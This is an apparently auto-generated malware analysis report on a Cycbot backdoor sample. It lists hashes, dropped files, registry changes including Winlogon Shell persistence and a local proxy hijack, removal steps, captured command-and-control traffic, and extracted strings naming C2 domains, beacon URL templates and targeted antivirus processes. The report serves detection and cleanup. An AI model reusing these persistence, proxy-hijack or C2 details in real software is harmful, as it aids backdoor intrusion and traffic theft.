Skip to main content

Backdoor.Win32.Cycbot_433902d636


HEUR:Backdoor.Win32.Generic (Kaspersky), Gen:Variant.Kazy.318916 (B) (Emsisoft), Gen:Variant.Kazy.318916 (AdAware), Backdoor.Win32.Cycbot.FD, Trojan.Win32.Swrort.3.FD, BackdoorCycbot.YR (Lavasoft MAS)Behaviour: Trojan, Backdoor

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: 433902d636a854854ec11eb2af93d1eb

SHA1: 8318113c3e8b3d493a66dd8c726f6adc4addefc8

SHA256: 082a78e0047ee92d4f072390e185efa4fd3eb543432e1b45b8b3d1e8042573ba

SSDeep: 3072:nYLcSldfhpukdE3ats J8vMtDS4AmN0mWotFowQjaxmiKqd1NDfCJyc:nYgS3hHdE/ J8vQDWotFvQjaIiKqdrDG

Size: 170496 bytes

File type: EXE

Platform: WIN32

Entropy: Packed

PEID: UPolyXv05_v6

Company: Premium Installer

Created at: 2005-09-22 00:51:49

Analyzed on: WindowsXP SP3 32-bit

Summary: Backdoor. Malware that enables a remote control of victim's machine.

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Backdoor creates the following process(es):

%original file name%.exe:312
%original file name%.exe:912

The Backdoor injects its code into the following process(es):

%original file name%.exe:716

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process %original file name%.exe:716 makes changes in the file system.


The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Program Files%\LP\4645\1.exe (43 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT (4252 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT.LOG (6520 bytes)
%Program Files%\LP\4645\2.exe (43 bytes)
%Documents and Settings%\%current user%\Application Data\507CF\F2C6.07C (3964 bytes)
%Documents and Settings%\%current user%\Application Data\507CF\5C946.exe (85017 bytes)

The Backdoor deletes the following file(s):

%Program Files%\LP\4645\1.exe (0 bytes)
%Program Files%\LP\4645\2.exe (0 bytes)

Registry activity

The process %original file name%.exe:312 makes changes in the system registry.


The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EA 77 C5 AE 3C BC 5F 7F F5 2F 2F 1A 01 0E BE 28"

[HKLM\SOFTWARE\Microsoft\Direct3D\MostRecentApplication]
"Name" = "%original file name%.exe"

The process %original file name%.exe:716 makes changes in the system registry.


The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 03 00 00 00 14 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "http=127.0.0.1:59980"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FB 87 2D 00 E8 D3 E2 B7 AB D2 85 C7 40 ED 04 19"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Direct3D\MostRecentApplication]
"Name" = "%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "3C 00 00 00 03 00 00 00 03 00 00 00 14 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Backdoor adds the reference to itself to be executed when a user logs on:

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "explorer.exe,%Documents and Settings%\%current user%\Application Data\507CF\5C946.exe"

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyOverride"

The process %original file name%.exe:912 makes changes in the system registry.


The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0A CC 7E 9F C6 DC 11 63 6D FA 2F 2F 7F 1A 7F D8"

[HKLM\SOFTWARE\Microsoft\Direct3D\MostRecentApplication]
"Name" = "%original file name%.exe"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.

Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:312
    %original file name%.exe:912

  2. Delete the original Backdoor file.
  3. Delete or disinfect the following files created/modified by the Backdoor:

    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
    %Program Files%\LP\4645\1.exe (43 bytes)
    %Documents and Settings%\%current user%\NTUSER.DAT (4252 bytes)
    %Documents and Settings%\%current user%\NTUSER.DAT.LOG (6520 bytes)
    %Program Files%\LP\4645\2.exe (43 bytes)
    %Documents and Settings%\%current user%\Application Data\507CF\F2C6.07C (3964 bytes)
    %Documents and Settings%\%current user%\Application Data\507CF\5C946.exe (85017 bytes)

  4. Remove the references to the Backdoor by modifying the following registry value(s) (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "Shell" = "explorer.exe,%Documents and Settings%\%current user%\Application Data\507CF\5C946.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

No information is available.

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text409688406885765.42793070e203a70fd851476c1701de8776828
.rdata9420841136820483.6176505877b50493dde8d6c65bae0cf6cb2a6
.data50790478026783365.50496d4028b801d591d1af3b139f0e8561fd8
.rsrc58982440965120.601867b9ae4ae4d062b26b8666ed86581f1b48

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL IP
hxxp://binghamtonschools.org/images/ace/1/ace_1101278014_1314729789.jpg?sv=967&tq=gJ4WK/SUh7TFk0R8oY+QtMWTUj26kJH7yZJTNbqVybhqtUn5CGFATA==174.129.25.170
hxxp://l8x4b5.remindmeroster.com/logo.png?sv=114&tq=gKZEtzoYwLzEvUb5dQzRsrCqA/YvTca3l74EgC1OjrPGpgfib1XFp5zpRPksUt+A/gSoSEU=141.8.225.62

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /logo.png?sv=114&tq=gKZEtzoYwLzEvUb5dQzRsrCqA/YvTca3l74EgC1OjrPGpgfib1XFp5zpRPksUt+A/gSoSEU= HTTP/1.0

Connection: close

Host: l8x4b5.remindmeroster.com

Accept: */*

User-Agent: chrome/9.0

HTTP/1.1 200 OK

Date: Thu, 24 Jul 2014 05:56:23 GMT

Server: Apache

Set-Cookie: gvc=909vr1537269833728567; expires=Tue, 23-Jul-2019 05:56:23 GMT; path=/; domain=l8x4b5.remindmeroster.com; httponly

Vary: Accept-Encoding,User-Agent

Content-Length: 51

Keep-Alive: timeout=5, max=128

Connection: close

Content-Type: text/html; charset=UTF-8

<html><head></head><body><!-- vbe --></body></html>..

GET /images/ace/1/ace_1101278014_1314729789.jpg?sv=967&tq=gJ4WK/SUh7TFk0R8oY+QtMWTUj26kJH7yZJTNbqVybhqtUn5CGFATA== HTTP/1.0

Connection: close

Host: binghamtonschools.org

Accept: */*

User-Agent: chrome/9.0

HTTP/1.1 301 Moved Permanently

Server: nginx/1.4.2

Date: Thu, 24 Jul 2014 05:56:10 GMT

Content-Type: text/html

Content-Length: 184

Connection: close

Location: hXXp://VVV.binghamtonschools.org/images/ace/1/ace_1101278014_1314729789.jpg?sv=967&tq=gJ4WK/SUh7TFk0R8oY+QtMWTUj26kJH7yZJTNbqVybhqtUn5CGFATA==

<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx/1.4.2</center>..</body>..</html>....

Map

The Backdoor connects to the servers at the folowing location(s):

Strings from Dumps

%original file name%.exe_716:

`.rsrc

`.rsrc

.SS%o

.SS%o

SSj%S

SSj%S

<%u,V

<%u,V

<3%u1f

<3%u1f

cmd.exe

cmd.exe

GetProcessWindowStation

GetProcessWindowStation

operator

operator

deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler

deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler

1.2.5

1.2.5

>`Visual C CRT: Not enough memory to complete call to strerror.

>`Visual C CRT: Not enough memory to complete call to strerror.

Broken pipe

Broken pipe

Inappropriate I/O control operation

Inappropriate I/O control operation

Operation not permitted

Operation not permitted

inflate 1.2.5 Copyright 1995-2010 Mark Adler

inflate 1.2.5 Copyright 1995-2010 Mark Adler

%d lines of %s read.

%d lines of %s read.

%d Function Prototypes found.

%d Function Prototypes found.

Including %d Library Functions.

Including %d Library Functions.

.bss align=16

.bss align=16

copy /b data.tmp bss.tmp code.tmp %s

copy /b data.tmp bss.tmp code.tmp %s

copy /b code.tmp data.tmp bss.tmp %s

copy /b code.tmp data.tmp bss.tmp %s

del *.tmp

del *.tmp

copy /b data.tmp code.tmp %s

copy /b data.tmp code.tmp %s

al,%s

al,%s

eax,%s

eax,%s

%s is not valid in:

%s is not valid in:

Warning - Return from non-void function %s with no value

Warning - Return from non-void function %s with no value

elend

elend

.text

.text

Warning -- "break" not supported in:

Warning -- "break" not supported in:

Error: %s not defined!

Error: %s not defined!

.data align=16

.data align=16

B1-1231 Warning - %s re-defined!

B1-1231 Warning - %s re-defined!

B1-1282 Warning - %s re-defined!

B1-1282 Warning - %s re-defined!

times %d db 0

times %d db 0

times %d dd 0

times %d dd 0

XML-20003: missing token %s at line %d, column %d

XML-20003: missing token %s at line %d, column %d

XML-20004: missing keyword %s at line %d, column %d

XML-20004: missing keyword %s at line %d, column %d

Action: Check/update the input data to the correct keyword.

Action: Check/update the input data to the correct keyword.

XML-20006: unexpected text at line %d column %d; expected EOF

XML-20006: unexpected text at line %d column %d; expected EOF

XML-20007: missing content model in element declaration at line %s, column %s

XML-20007: missing content model in element declaration at line %s, column %s

{35BCA615-C82A-4152-8857-BCC626AE4C8D}

{35BCA615-C82A-4152-8857-BCC626AE4C8D}

\Windows NT

\Windows NT

%s\%s

%s\%s

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

explorer.exe,%s

explorer.exe,%s

{A1D429DE-B782-4253-84AD-6E09A8438AD5}

{A1D429DE-B782-4253-84AD-6E09A8438AD5}

{4D92BB9F-9A66-458f-ACA4-66172A7016D4}

{4D92BB9F-9A66-458f-ACA4-66172A7016D4}

lvvm.exe

lvvm.exe

{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}

{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}

{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}

{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}

{6B985724-623F-492e-B0D6-C9715ADE853B}

{6B985724-623F-492e-B0D6-C9715ADE853B}

{B37C48AF-B05C-4520-8B38-2FE181D5DC78}

{B37C48AF-B05C-4520-8B38-2FE181D5DC78}

{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}

{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}

Advapi32.dll

Advapi32.dll

%s%s_1

%s%s_1

%s_0_%d_%s

%s_0_%d_%s

%s_%d

%s_%d

%s_%d_%d_%d_%d

%s_%d_%d_%d_%d

%s_%s

%s_%s

http://xprstats.com/k1.php

http://xprstats.com/k1.php

type=%s&system=na&id=%s&status=%s

type=%s&system=na&id=%s&status=%s

t=st&q=%s

t=st&q=%s

%s?tq=%s

%s?tq=%s

TMFLDMN%d

TMFLDMN%d

id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=118

id=%s&p3=0&p4=0&hwid=%s&c=%d&nax=7&ver=118

%s_%s_%d

%s_%s_%d

_1_%d

_1_%d

_2_%d

_2_%d

_3_%d

_3_%d

_4_%d

_4_%d

grizlybigtit.com

grizlybigtit.com

cloudstorepro.com

cloudstorepro.com

remindmeroster.com

remindmeroster.com

yordatazone.com

yordatazone.com

sitystorefor.com

sitystorefor.com

datastorepro.com

datastorepro.com

onlinepdahelpforyou.com

onlinepdahelpforyou.com

remarkreddomas.com

remarkreddomas.com

transfersakkonline.com

transfersakkonline.com

backupdomaintolevel.com

backupdomaintolevel.com

SELECT_RESERV_SRV_%d

SELECT_RESERV_SRV_%d

http://%s.%s

http://%s.%s

%s.%s

%s.%s

stor.cfg

stor.cfg

exec%s

exec%s

%s_%d_%s

%s_%d_%s

id=%s&c=%d

id=%s&c=%d

%s_%d_%d_%d

%s_%d_%d_%d

%s_%d_%d

%s_%d_%d

%s %s

%s %s

%s start%s%c%s

%s start%s%c%s

c1.exe

c1.exe

c2.exe

c2.exe

c3.exe

c3.exe

DWN_CON_STRP_%d_%s

DWN_CON_STRP_%d_%s

http://

http://

http://%d.ctrl.%s

http://%d.ctrl.%s

logo.png

logo.png

img/135.png

img/135.png

img/136.png

img/136.png

t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d

t=%s&p4=0&q=%s&z22=0&s=%d&hrs=%d

t=%s&q=&s=%d&hrs=%d

t=%s&q=&s=%d&hrs=%d

%s/%s?sv=%d&tq=%s

%s/%s?sv=%d&tq=%s

%s:%d/%s?sv=%d&tq=%s

%s:%d/%s?sv=%d&tq=%s

http://binghamtonschools.org/images/ace/1/ace_1101278014_1314729789.jpg

http://binghamtonschools.org/images/ace/1/ace_1101278014_1314729789.jpg

http://binghamtonschools.org/images/297893.jpg

http://binghamtonschools.org/images/297893.jpg

http://binghamtonschools.org/images/297894.jpg

http://binghamtonschools.org/images/297894.jpg

http://alleducationalsoftware.com/creditcardlogos.gif

http://alleducationalsoftware.com/creditcardlogos.gif

http://alleducationalsoftware.com/creditcard.png

http://alleducationalsoftware.com/creditcard.png

http://alleducationalsoftware.com/creditcard2.png

http://alleducationalsoftware.com/creditcard2.png

http://patentgenius.com/temp/head.png

http://patentgenius.com/temp/head.png

http://patentgenius.com/132.gif

http://patentgenius.com/132.gif

http://patentgenius.com/133.gif

http://patentgenius.com/133.gif

http://freedownload3.com/screenshot/4/s/89_3276.gif

http://freedownload3.com/screenshot/4/s/89_3276.gif

http://freedownload3.com/screenshot/4/s/89_3277.gif

http://freedownload3.com/screenshot/4/s/89_3277.gif

http://freedownload3.com/screenshot/4/s/89_3278.gif

http://freedownload3.com/screenshot/4/s/89_3278.gif

http://istockanalyst.com/png/intel.gif

http://istockanalyst.com/png/intel.gif

http://istockanalyst.com/png/intel.jpg

http://istockanalyst.com/png/intel.jpg

http://istockanalyst.com/12.jpg

http://istockanalyst.com/12.jpg

http://complaintsboard.com/complaints/logo.png

http://complaintsboard.com/complaints/logo.png

http://complaintsboard.com/complaints/zip.png

http://complaintsboard.com/complaints/zip.png

http://complaintsboard.com/complaints/rar.png

http://complaintsboard.com/complaints/rar.png

http://highspeedinternetlosangeles.webnode.com/news/1.cgi

http://highspeedinternetlosangeles.webnode.com/news/1.cgi

http://highspeedinternetlosangeles.webnode.com/news/1.php

http://highspeedinternetlosangeles.webnode.com/news/1.php

http://highspeedinternetlosangeles.webnode.com/news/2.php

http://highspeedinternetlosangeles.webnode.com/news/2.php

http://newworldorderreport.com/favicon.ico

http://newworldorderreport.com/favicon.ico

http://newworldorderreport.com/img/3421.png

http://newworldorderreport.com/img/3421.png

http://newworldorderreport.com/img/3422.png

http://newworldorderreport.com/img/3422.png

http://jointhenewworldorder.com/images/pages.jpg

http://jointhenewworldorder.com/images/pages.jpg

http://jointhenewworldorder.com/images/pages.png

http://jointhenewworldorder.com/images/pages.png

http://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame6.png

http://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame6.png

http://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame7.png

http://cdn.adventofdeception.com/wp-content/uploads/2011/06/frame7.png

http://cdn.adventofdeception.com/logo.png

http://cdn.adventofdeception.com/logo.png

t=t&hrs=%d&q=id=1000&ver=%s&s=%d

t=t&hrs=%d&q=id=1000&ver=%s&s=%d

t=ip&hrs=%d&q=&s=1

t=ip&hrs=%d&q=&s=1

%s?sv=%d&tq=%s

%s?sv=%d&tq=%s

\bl%d_64.bat

\bl%d_64.bat

del "%s"

del "%s"

if exist "%s" goto a

if exist "%s" goto a

cmd.exe /c "%s"

cmd.exe /c "%s"

GET %s HTTP/1.1

GET %s HTTP/1.1

Host: %s

Host: %s

User-Agent: chrome/9.0

User-Agent: chrome/9.0

{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d

{ÕD9E4E0-906C-4B81-B1BF-2E9A76248146}_%d

{C66E79CE-8935-4ed9-A6B1-4983619CB925}

{C66E79CE-8935-4ed9-A6B1-4983619CB925}

{61B98B86-5F44-42b3-BCA1-33904B067B81}

{61B98B86-5F44-42b3-BCA1-33904B067B81}

{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}

{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}

{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}

{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}

ahst.lni

ahst.lni

milktoyoustudios.com

milktoyoustudios.com

http://%s/s.php?c=121&id=%s

http://%s/s.php?c=121&id=%s

bigbulkhypnocrys.com

bigbulkhypnocrys.com

http://xprstats.com/images/logo.png

http://xprstats.com/images/logo.png

drweb

drweb

id=%s&hwid=%s&ver=%d&os=%s&av=%s&wd=%d&fw=%s&port=%d

id=%s&hwid=%s&ver=%d&os=%s&av=%s&wd=%d&fw=%s&port=%d

t=ml&q=%s

t=ml&q=%s

xprstats.com

xprstats.com

http://%s%s

http://%s%s

%s_1_%d_%s

%s_1_%d_%s

%s_2_%d_%s

%s_2_%d_%s

%s_3_%d_%s

%s_3_%d_%s

%s_4_%d_%s

%s_4_%d_%s

pmv=2&id=%s&hwid=%s

pmv=2&id=%s&hwid=%s

u.exe

u.exe

%s up%s

%s up%s

&%s=%s

&%s=%s

avgnt.exe

avgnt.exe

AVGIDSAgent.exe

AVGIDSAgent.exe

avgwdsvc.exe

avgwdsvc.exe

ccsvchst.exe

ccsvchst.exe

AvastUI.exe

AvastUI.exe

mcagent.exe

mcagent.exe

PRM_LSTN_THIS_PORT

PRM_LSTN_THIS_PORT

Opera

Opera

127.0.0.1

127.0.0.1

HTTP/1.x

HTTP/1.x

google.com

google.com

http://www.google.com

http://www.google.com

HTTP/1.1 302 Found

HTTP/1.1 302 Found

Location: %s

Location: %s

id=%s&type=%d&ppcid=%s

id=%s&type=%d&ppcid=%s

%s: %s

%s: %s

%s_5_%s

%s_5_%s

http=127.0.0.1:

http=127.0.0.1:

prefs.js

prefs.js

Mozilla

Mozilla

"network.proxy.http"

"network.proxy.http"

"network.proxy.http_port"

"network.proxy.http_port"

"network.proxy.type"

"network.proxy.type"

"127.0.0.1"

"127.0.0.1"

%s(%s, %s);

%s(%s, %s);

operaprefs.ini

operaprefs.ini

Use HTTP

Use HTTP

HTTP server

HTTP server

127.0.0.1:%s

127.0.0.1:%s

%s=%s

%s=%s

%s:%s

%s:%s

hwid=%s&yui=2&id=%s&step=1&wd=%d&rvn=56&av=%s

hwid=%s&yui=2&id=%s&step=1&wd=%d&rvn=56&av=%s

id=%s&hwid=%s

id=%s&hwid=%s

exec|%s

exec|%s

http=

http=

HTTP/1.0 200 OK

HTTP/1.0 200 OK

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

bing.com

bing.com

yahoo.com

yahoo.com

search.aol.

search.aol.

suche.aol.

suche.aol.

searcht2.aol.

searcht2.aol.

.yimg.com

.yimg.com

.bing.net

.bing.net

scorecardresearch.com

scorecardresearch.com

brightcove.com

brightcove.com

.aol.

.aol.

.atwola.

.atwola.

.ivwbox.

.ivwbox.

.google

.google

.atdmt.

.atdmt.

.abmr.

.abmr.

.tacoda.

.tacoda.

.adtechus.

.adtechus.

.autodatadirect.

.autodatadirect.

.mapquestapi.

.mapquestapi.

.ggpht.

.ggpht.

.virtualearth.

.virtualearth.

.opera.

.opera.

.microsoft.

.microsoft.

.wsod.

.wsod.

.doubleclick.

.doubleclick.

.ypcdn.

.ypcdn.

.truveo.

.truveo.

.tlowdb.

.tlowdb.

mapq.st

mapq.st

.dartsearch.

.dartsearch.

.thawte.

.thawte.

http://

http://

bing.com/search

bing.com/search

bing.com:80/search

bing.com:80/search

search.yahoo.com/search

search.yahoo.com/search

%s_1_%s

%s_1_%s

err%d%s_%d_%d

err%d%s_%d_%d

err0%s_%d_%d

err0%s_%d_%d

ver=118&system=%d&id=%s&hwid=%s&search=%s&referer=%s&useragent=%s&lang=%s&type=%d

ver=118&system=%d&id=%s&hwid=%s&search=%s&referer=%s&useragent=%s&lang=%s&type=%d

%s:443/%s

%s:443/%s

%s_2_%s

%s_2_%s

%s_%s_%s

%s_%s_%s

%s_3_%s

%s_3_%s

www.www.ru

www.www.ru

https://

https://

.doubleclick.net

.doubleclick.net

doubleclick.net

doubleclick.net

msn.com

msn.com

%s_0%d_%d

%s_0%d_%d

=='undefined'?'%s':'%s'

=='undefined'?'%s':'%s'

.referrer

.referrer

HTTP/1.0

HTTP/1.0

%s %s %s

%s %s %s

http://www.google.com/

http://www.google.com/

http://www.yahoo.com/

http://www.yahoo.com/

.class

.class

.midi

.midi

google_ad.url

google_ad.url

google_ad.title

google_ad.title

r.msn.com

r.msn.com

google_ad.line1

google_ad.line1

zcÁ

zcÁ

c:\%original file name%.exe

c:\%original file name%.exe

%Program Files%\CF2C6

%Program Files%\CF2C6

%Documents and Settings%\%current user%\Application Data\507CF

%Documents and Settings%\%current user%\Application Data\507CF

%Program Files%\LP\4645

%Program Files%\LP\4645

GetCPInfo

GetCPInfo

RegFlushKey

RegFlushKey

RegOpenKeyExA

RegOpenKeyExA

RegCloseKey

RegCloseKey

WinHttpReadData

WinHttpReadData

WinHttpOpenRequest

WinHttpOpenRequest

WinHttpOpen

WinHttpOpen

WinHttpQueryDataAvailable

WinHttpQueryDataAvailable

WinHttpReceiveResponse

WinHttpReceiveResponse

WinHttpSendRequest

WinHttpSendRequest

WinHttpConnect

WinHttpConnect

WinHttpCloseHandle

WinHttpCloseHandle

`.rdata

`.rdata

@.data

@.data

.rsrc

.rsrc

<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>

<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>

KERNEL32.DLL

KERNEL32.DLL

ADVAPI32.dll

ADVAPI32.dll

ole32.dll

ole32.dll

OLEAUT32.dll

OLEAUT32.dll

RASAPI32.dll

RASAPI32.dll

RPCRT4.dll

RPCRT4.dll

SHELL32.dll

SHELL32.dll

SHLWAPI.dll

SHLWAPI.dll

USER32.dll

USER32.dll

WINHTTP.dll

WINHTTP.dll

WININET.dll

WININET.dll

WS2_32.dll

WS2_32.dll

%-k}NB

%-k}NB

4Z.Xn

4Z.Xn

mscoree.dll

mscoree.dll

nKERNEL32.DLL

nKERNEL32.DLL

- Attempt to initialize the CRT more than once.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- CRT not initialized

- floating point support not loaded

- floating point support not loaded

WUSER32.DLL

WUSER32.DLL

Dr.Web

Dr.Web

mhttp=127.0.0.1:%d

mhttp=127.0.0.1:%d

http://www.yahoo.com

http://www.yahoo.com

2.0.2.1

2.0.2.1

%original file name%.exe_716_rwx_0015C000_00001000:

|VirtualProtect.dll

|VirtualProtect.dll

%original file name%.exe_716_rwx_00400000_0008E000:

`.rsrc

`.rsrc

.SS%o

.SS%o

SSj%S

SSj%S

<%u,V

<%u,V

<3%u1f

<3%u1f

cmd.exe

cmd.exe

GetProcessWindowStation

GetProcessWindowStation

operator

operator

deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler

deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler

1.2.5

1.2.5

>`Visual C CRT: Not enough memory to complete call to strerror.

>`Visual C CRT: Not enough memory to complete call to strerror.

Broken pipe

Broken pipe

Inappropriate I/O control operation

Inappropriate I/O control operation

Operation not permitted

Operation not permitted

inflate 1.2.5 Copyright 1995-2010 Mark Adler

inflate 1.2.5 Copyright 1995-2010 Mark Adler

%d lines of %s read.

%d lines of %s read.

%d Function Prototypes found.

%d Function Prototypes found.

Including %d Library Functions.

Including %d Library Functions.

.bss align=16

.bss align=16

copy /b data.tmp bss.tmp code.tmp %s

copy /b data.tmp bss.tmp code.tmp %s

copy /b code.tmp data.tmp bss.tmp %s

copy /b code.tmp data.tmp bss.tmp %s

del *.tmp

del *.tmp

copy /b data.tmp code.tmp %s

copy /b data.tmp code.tmp %s

al,%s

al,%s

eax,%s

eax,%s

%s is not valid in:

%s is not valid in:

Warning - Return from non-void function %s with no value

Warning - Return from non-void function %s with no value

elend

elend

.text

.text

Warning -- "break" not supported in:

Warning -- "break" not supported in:

Error: %s not defined!

Error: %s not defined!

.data align=16

.data align=16

B1-1231 Warning - %s re-defined!

B1-1231 Warning - %s re-defined!

B1-1282 Warning - %s re-defined!

B1-1282 Warning - %s re-defined!

times %d db 0

times %d db 0

times %d dd 0

times %d dd 0

XML-20003: missing token %s at line %d, column %d

XML-20003: missing token %s at line %d, column %d

XML-20004: missing keyword %s at line %d, column %d

XML-20004: missing keyword %s at line %d, column %d

Action: Check/update the input data to the correct keyword.

Action: Check/update the input data to the correct keyword.

XML-20006: unexpected text at line %d column %d; expected EOF

XML-20006: unexpected text at line %d column %d; expected EOF

XML-20007: missing content model in element declaration at line %s, column %s

XML-20007: missing content model in element declaration at line %s, column %s

{35BCA615-C82A-4152-8857-BCC626AE4C8D}

{35BCA615-C82A-4152-8857-BCC626AE4C8D}

\Windows NT

\Windows NT

%s\%s

%s\%s

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

explorer.exe,%s

explorer.exe,%s

{A1D429DE-B782-4253-84AD-6E09A8438AD5}

{A1D429DE-B782-4253-84AD-6E09A8438AD5}

{4D92BB9F-9A66-458f-ACA4-66172A7016D4}

{4D92BB9F-9A66-458f-ACA4-66172A7016D4}

lvvm.exe

lvvm.exe

{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}

{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}

{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}

{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}

{6B985724-623F-492e-B0D6-C9715ADE853B}

{6B985724-623F-492e-B0D6-C9715ADE853B}

{B37C48AF-B05C-4520-8B38-2FE181D5DC78}

{B37C48AF-B05C-4520-8B38-2FE181D5DC78}

{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}

{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}

Advapi32.dll

Advapi32.dll

%s%s_1

%s%s_1

%s_0_%d_%s

%s_0_%d_%s

%s_%d

%s_%d

%s_%d_%d_%d_%d

